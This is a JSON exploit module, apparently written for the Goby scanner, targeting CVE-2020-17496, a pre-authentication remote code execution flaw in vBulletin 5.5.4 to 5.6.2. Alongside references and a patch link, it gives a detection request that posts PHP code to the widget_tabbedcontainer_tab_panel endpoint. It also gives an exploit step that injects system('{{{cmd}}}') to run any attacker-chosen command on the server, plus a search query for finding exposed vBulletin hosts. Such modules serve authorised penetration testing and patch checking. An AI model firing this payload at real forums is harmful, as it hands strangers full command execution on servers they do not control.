{
  "Name": "vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496",
  "Description": "vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.",
  "Product": "vBulletin",
  "Homepage": "http://www.vBulletin.com/",
  "DisclosureDate": "2020-08-12",
  "Author": "gobysec@gmail.com",
  "FofaQuery": "app=vBulletin",
  "GobyQuery": "app=vBulletin",
  "Level": "3",
  "Impact": "This issue may lead to Remote Code execution.",
  "Recommendation": "Download patch from https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4445227-vbulletin-5-6-0-5-6-1-5-6-2-security-patch",
  "References": [
    "https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/",
    "https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4445227-vbulletin-5-6-0-5-6-1-5-6-2-security-patch",
    "https://seclists.org/fulldisclosure/2020/Aug/5",
    "https://nvd.nist.gov/vuln/detail/CVE-2020-17496",
    "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17496",
	"https://unit42.paloaltonetworks.com/cve-2020-17496/"
  ],
  "HasExp": true,
  "ExpParams": [{
                  "name": "cmd",
                  "type": "input",
                  "value": "whoami"
            }],
  "ExpTips": {
    "Type": "",
    "Content": ""
  },
  "ScanSteps": [
            "AND",
            {
                  "Request": {
                        "method": "POST",
                        "uri": "/ajax/render/widget_tabbedcontainer_tab_panel",
                        "follow_redirect": true,
                        "header": {"Content-Type":"application/x-www-form-urlencoded"},
                        "data_type": "text",
                        "data": "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo md5('vBulletin');exit;"
                  },
                  "ResponseTest": {
					"checks": [
					  {
						"bz": "",
						"operation": "contains",
						"type": "item",
						"value": "be4ea51d962be8308a0099ae1eb3ec63",
						"variable": "$body"
					  }
					],
					"operation": "AND",
					"type": "group"
				  },
                  "SetVariable": []
            }
      ],
  "ExploitSteps": [
    "AND",
    {
      "Request": {
			"method": "POST",
			"uri": "/ajax/render/widget_tabbedcontainer_tab_panel",
			"follow_redirect": true,
			"header": {"Content-Type":"application/x-www-form-urlencoded"},
			"data_type": "text",
			"data": "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=system('{{{cmd}}}');exit;"
	  },
      "SetVariable": [
        "output|lastbody"
      ]
    }
  ],
  "Tags": ["rce"],
  "CVEIDs": [
    "CVE-2020-17496"
  ],
  "CVSSScore": "9.8",
  "AttackSurfaces": {
    "Application": ["vBulletin"],
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
  }
}